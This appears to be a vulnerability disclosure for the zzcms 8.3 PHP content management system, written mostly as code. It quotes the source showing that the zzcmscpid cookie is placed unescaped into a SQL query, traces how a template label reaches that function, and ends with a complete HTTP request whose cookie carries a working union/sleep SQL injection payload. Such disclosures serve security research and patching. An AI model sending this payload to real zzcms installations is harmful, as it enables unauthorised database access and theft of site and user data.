http://www.zzcms.net/about/6.htm
http://www.zzcms.net/download/zzcms8.3.zip
in file zs/subzs.php line 1-24:
function showcookiezs($cs){
$str="";
$cs=explode(",",$cs); //传入的$cs是一个整体字符串,转成数组
$column=isset($cs[0])?$cs[0]:3;
$imgwidth=isset($cs[1])?$cs[1]:80;
$imgheight=isset($cs[2])?$cs[2]:80;
$title_num=isset($cs[3])?$cs[3]:6;
if (!isset($_COOKIE["zzcmscpid"])){
$str="暂无记录";
}else{
$cpid=$_COOKIE["zzcmscpid"];
if (strpos($cpid,",")>0){
$cpid=str_replace(" ","",$cpid);
$cpid=str_replace("deleted","",$cpid);//cookie会出现deleted的情况
$sql="select id,proname,img from zzcms_main where id in (".$cpid.")";
}else{
checkid($cpid);
$sql="select id,proname,img from zzcms_main where id='$cpid' ";
}
...in file labels.php line 57-73,function fixed:
function fixed($cs,$channel){
switch ($channel){
case 'ad':return showad($cs); break;
case 'zs':return showzs($cs); break;
case 'dl':return showdl($cs); break;
case 'pp':return showpp($cs); break;
case 'job':return showjob($cs); break;
case 'zx':return showzx($cs); break;
case 'zh':return showzh($cs); break;
case 'announce':return showannounce($cs); break;
case 'cookiezs':return showcookiezs($cs); break;
case 'zsclass':return showzsclass($cs); break;
case 'keyword':return showkeyword($cs); break;
case 'province':return showprovince($cs); break;
case 'sitecount':return showsitecount($cs); break;
}
}
...in file labels.php line 1-16:
<?php
//产品版
function showlabel($str){
global $b;//zsshow需要从zs/class.php获取$b;zxshow从s/class.php获取$b;
//checkver($str);
//固定标签
$channels=array('ad','zs','dl','zx','pp','job','zh','announce','cookiezs','zsclass','keyword','province','sitecount');
foreach ($channels as $value) {
if (strpos($str,"{#show".$value.":")!==false){
$n=count(explode("{#show".$value.":",$str));//循环之前取值
for ($i=1;$i<$n;$i++){
$cs=strbetween($str,"{#show".$value.":","}");
if ($cs<>''){$str=str_replace("{#show".$value.":".$cs."}",fixed($cs,$value),$str);} //$cs直接做为一个整体字符串参数传入,调用时再转成数组遍历每项值
}
}}in file zs/zs.php line 342:
$strout=showlabel($strout);line 204-207:
$fp="../template/".$siteskin."/zs.htm";
$f = fopen($fp,'r');
$strout = fread($f,filesize($fp));
fclose($f);in file template/red13/zs.htm:
<div class="content1">{#showcookiezs:3,60,60}</div>
GET /zs/zs.php HTTP/1.1
Host: lzy.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UserName=admin; zzcmscpid=1)%0aunion%0aselect%0asleep(0),2,3#,12); PHPSESSID=82cd4ed33d175f6a22d2ceeaf7f10e93;
Connection: close
